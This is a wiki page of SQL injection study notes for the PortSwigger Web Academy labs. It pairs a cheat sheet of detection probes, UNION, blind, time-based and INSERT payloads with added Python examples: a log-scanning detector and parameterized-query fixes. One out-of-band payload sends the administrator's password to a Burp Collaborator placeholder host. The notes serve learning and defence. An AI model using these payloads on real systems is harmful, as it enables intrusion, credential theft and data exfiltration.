
Web Academy: SQL injection

0xghostwriter edited this page Jun 23, 2021 · 1 revision

Detecting SQLi

Break Query:
    '
    "
    )
    ')
    ")
    #
    -- 
    *
    \
    \'
    --'
Boolean Detection:
    AND 1=1 --
    AND 1=2 --
Time Detection:
    Strings:
         '-sleep(5)-'        (subtracting strings with sleep function)
         '; IF (1=1) WAITFOR DELAY '0:0:10'--
         ' sleep(10) --
         '|| pg_sleep(10)--           (concatenate sleep function with string)
         '|| dbms_pipe.receive_message(('a'),10)--          (concatenate sleep with string)
         ' or sleep(10)#
         ';waitfor delay '0:0:__TIME__'--
         https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/SQLi/Generic-BlindSQLi.fuzzdb.txt
    Integers:
        1/sleep(10)
        1-sleep(10)
        -sleep/*f*/(10)
        %0a%0d/sleep(3)
Mathematical Operations:
    1+1
    3-2
Out-of-Band Detection:
    https://github.com/0xhelloworld/bughunter/blob/master/SQL%20Injection%20OOB%20(OAST)%20payloads

Detecting SQLi from bug bounty hunter: https://twitter.com/pwntheweb/status/1253224265853198336

/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||'   <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='
  • Look for HTTP 500
  • Look for error messages
  • Compare the content length of a baseline response against the response to the request carrying the SQL payload
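As an added defender-side example (not part of the original notes), here is a small Python scanner that applies the probe patterns listed above to web-server access log lines. The log lines are constructed for this example, in combined format with a trailing response time in milliseconds; the signature names, the 5-second slowness threshold and the field layout are assumptions, not anything the notes specify.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (Apache-style combined log plus a trailing
# response time in milliseconds). These are made up for the example.
SAMPLE_LOG = """\
10.0.0.5 - - [23/Jun/2021:10:00:01 +0000] "GET /products?category=Gifts HTTP/1.1" 200 5120 13
10.0.0.9 - - [23/Jun/2021:10:00:02 +0000] "GET /products?category=Gifts' HTTP/1.1" 500 512 9
10.0.0.9 - - [23/Jun/2021:10:00:03 +0000] "GET /products?category=Gifts'+UNION+SELECT+NULL,NULL-- HTTP/1.1" 500 512 11
10.0.0.9 - - [23/Jun/2021:10:00:04 +0000] "GET /products?category=Gifts'%7C%7C+pg_sleep(10)-- HTTP/1.1" 200 5120 10042
10.0.0.9 - - [23/Jun/2021:10:00:05 +0000] "GET /products?category=Gifts'+AND+1=2-- HTTP/1.1" 200 480 12
10.0.0.7 - - [23/Jun/2021:10:00:06 +0000] "GET /search?q=what's+new HTTP/1.1" 200 2100 15
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) (?P<ms>\d+)$'
)

# Signatures derived from the probe list in the notes; matched against the URL-decoded URI.
SIGNATURES = {
    "union_select": re.compile(r"union\s+(all\s+)?select", re.I),
    "schema_enum": re.compile(r"information_schema|all_tables|all_tab_columns", re.I),
    "time_delay": re.compile(r"\b(sleep|pg_sleep|dbms_pipe\.receive_message)\s*\(|waitfor\s+delay", re.I),
    "boolean_probe": re.compile(r"\b(or|and)\s+\d+\s*=\s*\d+", re.I),
    "comment_terminator": re.compile(r"['\")]\s*(--|#|/\*)"),
}
SLOW_MS = 5000  # constructed threshold for "the sleep payload actually delayed the response"


def parse_line(line):
    """Split one log line into fields; returns None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["ms"] = int(rec["ms"])
    # Payloads arrive URL-encoded ('+' for space, %7C for '|'); decode before matching.
    rec["decoded_uri"] = unquote_plus(rec["uri"])
    return rec


def classify(rec):
    """Return the list of signal names that fire for one parsed request."""
    uri = rec["decoded_uri"]
    signals = [name for name, rx in SIGNATURES.items() if rx.search(uri)]
    # A bare quote/backslash is ordinary input; it only counts when the server errored
    # (the "look for HTTP 500" check from the notes).
    if rec["status"] == 500 and any(c in uri for c in "'\"\\"):
        signals.append("error_after_quote")
    # A sleep-style payload whose response really was slow confirms time-based injection.
    if "time_delay" in signals and rec["ms"] >= SLOW_MS:
        signals.append("confirmed_delay")
    return signals


def scan_log(text):
    """Return one finding per log line that shows at least one injection signal."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        signals = classify(rec)
        if signals:
            findings.append({"client": rec["client"], "uri": rec["decoded_uri"],
                             "status": rec["status"], "ms": rec["ms"], "signals": signals})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["client"], f["status"], f["ms"], f["signals"], f["uri"])
```

The request `/search?q=what's+new` is not reported: a lone quote is common in legitimate input, so the scanner only treats it as a signal together with a 500 response. The slow `pg_sleep` request is flagged twice, once for the payload text and once because the measured response time confirms it worked, which is the pair a defender wants to alert on.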

Exploiting SQLi

Union Based SQLi

  • Use when results of the SQL query are returned in the application's responses

Original Query: SELECT name, description FROM products WHERE category = 'Gifts'

Injection: ' UNION SELECT username, password FROM users--

  • UNION allows you to execute one or more additional SELECT queries
  • Two Requirements for UNION queries to work:
    • Both queries must return the same number of columns (Ask yourself how many columns are being returned by OG query?)
    • Data types in each column must be compatible between both queries (Ask yourself what kind of data the columns from OG query are returning)

Determine Number of Columns Required (ORDER BY METHOD):

  • Try ordering by a specific column number 1,2,3,4 until you get an error

' ORDER BY 3--

Determine Number of Columns Required (UNION SELECT method):

  • Try appending a SELECT query to SELECT X amount of columns until you cause an error. REMEMBER: the query you are injecting into and the UNION SELECT query you are appending must return the SAME number of columns.

' UNION SELECT NULL,NULL--

' UNION SELECT NULL,NULL,NULL--

' UNION SELECT NULL,NULL,NULL,NULL--

Finding Columns with useful data type

  • Most of the columns with critical data will be in string form.
  • The concept is simple: substitute each NULL in the UNION SELECT with a string, one position at a time, until one is reflected in the response:
    ' UNION SELECT 'a',NULL,NULL,NULL--
    ' UNION SELECT NULL,'a',NULL,NULL--

Extracting tables via UNION SELECT

  • '+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--

Extracting Columns via Union SELECT

  • '+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='USERS_ABCDEF'--

Extracting tables via UNION SELECT (ORACLE)

  • '+union+select+table_name,null+from+all_tables

Extracting columns via UNION SELECT (ORACLE)

  • '+union+select+column_name,null+from+all_tab_columns+where+table_name='USERS_HZMJYI'
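The two UNION requirements (same column count, compatible types) are easiest to see against a real engine. The following is an added example, not code from the notes or from PortSwigger: it builds the products/users schema from the notes in an in-memory SQLite database (an assumption; the labs run MySQL, PostgreSQL or Oracle), runs the category lookup with string concatenation as the notes describe, and then runs the same inputs through a parameterized query. The table contents and the function names `make_db`, `products_vulnerable`, `products_safe` and `run_vulnerable` are constructed for the example.

```python
import sqlite3


def make_db():
    """Constructed sample data mirroring the products/users example in the notes."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products (name TEXT, description TEXT, category TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO products VALUES
            ('Mug', 'A mug', 'Gifts'), ('Pen', 'A pen', 'Gifts'), ('Hammer', 'A hammer', 'Tools');
        INSERT INTO users VALUES ('administrator', 'constructed-secret'), ('wiener', 'peter');
    """)
    return con


def products_vulnerable(con, category):
    # The input is spliced into the SQL text, so a quote closes the literal and
    # whatever follows is parsed as SQL (the pattern the notes exploit).
    sql = "SELECT name, description FROM products WHERE category = '" + category + "'"
    return con.execute(sql).fetchall()


def products_safe(con, category):
    # Bound parameter: the input travels as a value and cannot change the query's shape.
    sql = "SELECT name, description FROM products WHERE category = ?"
    return con.execute(sql, (category,)).fetchall()


def run_vulnerable(con, category):
    """Return ('rows', rows) or ('error', message). The column-count probes in the
    notes work precisely because an error is distinguishable from a normal response."""
    try:
        return ("rows", products_vulnerable(con, category))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    con = make_db()
    for payload in ("Gifts",
                    "Gifts' UNION SELECT NULL,NULL,NULL--",   # wrong column count -> engine error
                    "Gifts' UNION SELECT NULL,NULL--",        # matching count -> extra (NULL, NULL) row
                    "Gifts' UNION SELECT username, password FROM users--"):
        print("vulnerable:", repr(payload), "->", run_vulnerable(con, payload))
        print("safe:      ", repr(payload), "->", products_safe(con, payload))
```

With the parameterized version every payload is simply a category name that matches nothing and returns an empty list, while the concatenated version either errors (three NULLs against a two-column query) or merges the users table into the product listing. SQLite's error text for the mismatch names the problem directly, which is exactly the signal the "count the columns" step above is looking for.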

TIPS:

Blind SQL Injection

Detecting Blind SQLi

True:

  • ' UNION SELECT 'a' WHERE 1=1--

False:

  • ' UNION SELECT 'a' WHERE 1=2--

True:

  • +OR+1=1--

False:

  • +OR+1=2--

  • Pro tip: there are cases where +OR+1=2-- still evaluates to true, leaving no difference between the responses to +OR+1=1-- and +OR+1=2--. With OR, if either the original query condition or the payload evaluates to true, the whole query evaluates to true and the application responds as for true.

True:

'+AND+1=1--

False:

'+AND+1=2--

  • In this case, AND implies that both the original query AND the payload must evaluate to true. BOTH must be true in order for the query to evaluate to true.

Exploiting blind SQLi via conditional responses

  • Application returns "Welcome Back" if query is successful, if not it returns nothing.
  • For this exploitation technique, you need a normal baseline request and a request with a broken SQL Query (inject ')

xyz' UNION SELECT 'a' FROM Users WHERE Username = 'Administrator' and SUBSTRING(Password, 1, 1) > 'm'--

xyz' UNION SELECT 'a' FROM Users WHERE Username = 'Administrator' and SUBSTRING(Password, 1, 1) > 't'--

xyz' UNION SELECT 'a' FROM Users WHERE Username = 'Administrator' and SUBSTRING(Password, 1, 1) = 's'--

Exploiting blind SQLi by conditional error messages

  • Throw an error message if query is true, do nothing if false.

True:

' UNION SELECT CASE WHEN (1=1) THEN 1/0 ELSE NULL END--

False:

' UNION SELECT CASE WHEN (1=2) THEN 1/0 ELSE NULL END--

  • Throw error message if user is admin and password is 6 characters

'+UNION+SELECT+CASE+WHEN+(username='administrator'+AND+length(password)=6)+THEN+to_char(1/0)+ELSE+NULL+END+FROM+users--

Exploiting time-based blind SQLi

  • If the condition is true, make the database wait before responding:

'%3B SELECT CASE WHEN (username='administrator' and substring(password,1,1) > 'a') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users--

Detecting blind SQLi via OOB interaction

  • Create an SQL query that triggers an out of band DNS call
'+UNION+SELECT+extractvalue(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//YOUR-SUBDOMAIN-HERE.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual--

Exploiting blind SQLi via OOB interaction

'+UNION+SELECT+extractvalue(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.YOUR-SUBDOMAIN-HERE.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual--

Tips:

  • Double quotes and single quotes matter, you can't use double quotes on one part of the query and use single quotes on another part of the query. Stick to one.
  • Add one condition to the SQLi query at a time; this avoids accidental SQL errors. Example order: verify the SQLi is there (' OR 1=1), check that the user you are targeting exists, check how long the password is, then start substring enumeration.
  • When injecting into a Cookie or URL, try URL encoding the payload; characters such as ; may otherwise not be interpreted correctly.
  • SQLi cheatsheet https://portswigger.net/web-security/sql-injection/cheat-sheet

Exploiting blind SQL injection in INSERT statements

  • Look for functionality that adds NEW data (not updates) to the database, e.g. first-time user registration, or leaving a product review where a name and email address are provided.

Assume the following INSERT query:

INSERT INTO users (username, email, password) VALUES('tester555', '[email protected]', 'tester555password');

  1. Fuzzing for the vulnerability:
     '-sleep(5)-'
  2. Result:
     INSERT INTO users (username, email, password) VALUES('tester555', ''-sleep(5)-'', 'tester555password');
  3. Data extraction payload:
     '-(IF((substring((select database()),1,1)) = 'c', sleep(5), 0))-'
  4. Result: if the current database name starts with 'c', sleep 5 seconds.
     INSERT INTO users (username, email, password) VALUES('tester7', ''-(IF((substring((select database()),1,1)) = 'c', sleep(5), 0))-'', 'hello1')
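Added example (not from the notes or the referenced posts): the INSERT above built by concatenation beside a parameterized one, again on in-memory SQLite (an assumption; the notes target MySQL). SQLite has no sleep() function, so the constructed stand-in payload '-(1)-' uses the same arithmetic splice without commas or comments; when it is evaluated, the stored email becomes -1 rather than the text the user submitted, which is both what the fuzzing step relies on and a discrepancy a post-write "stored value equals submitted value" check would catch. The function names are constructed.

```python
import sqlite3


def make_db():
    """Constructed users table with the three columns used in the notes' INSERT."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, email TEXT, password TEXT)")
    return con


def register_vulnerable(con, username, email, password):
    # Concatenated INSERT as in the notes: each value is wrapped in quotes by hand,
    # so a value containing quotes becomes part of the statement.
    sql = ("INSERT INTO users (username, email, password) VALUES('"
           + username + "', '" + email + "', '" + password + "')")
    con.execute(sql)


def register_safe(con, username, email, password):
    # Parameterized INSERT: the driver binds the values; quotes and minus signs are data.
    con.execute("INSERT INTO users (username, email, password) VALUES(?, ?, ?)",
                (username, email, password))


def stored_email(con, username):
    """Read back what actually landed in the email column for a user."""
    row = con.execute("SELECT email FROM users WHERE username = ?", (username,)).fetchone()
    return row[0] if row else None


def value_was_evaluated(stored, submitted):
    """True when the database stored something other than the submitted text,
    i.e. the input was executed as an expression instead of kept as a value."""
    return stored != submitted


# Stand-in for the notes' '-sleep(5)-' payload (SQLite has no sleep()); constructed.
SPLICE_PAYLOAD = "'-(1)-'"

if __name__ == "__main__":
    con = make_db()
    register_vulnerable(con, "tester555", SPLICE_PAYLOAD, "tester555password")
    register_safe(con, "tester7", SPLICE_PAYLOAD, "hello1")
    for user in ("tester555", "tester7"):
        value = stored_email(con, user)
        print(user, repr(value),
              "EVALUATED" if value_was_evaluated(value, SPLICE_PAYLOAD) else "stored verbatim")
```

In the vulnerable path the statement becomes `VALUES('tester555', ''-(1)-'', ...)`, so the email column receives the result of `'' - 1 - ''`, which SQLite stores as the text "-1". The parameterized path stores the seven-character payload exactly as typed, which is the behaviour the INSERT should have had all along.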

References: https://blog.redforce.io/sql-injection-in-insert-update-query-without-comma/ https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/ https://portswigger.net/support/sql-injection-in-different-statement-types
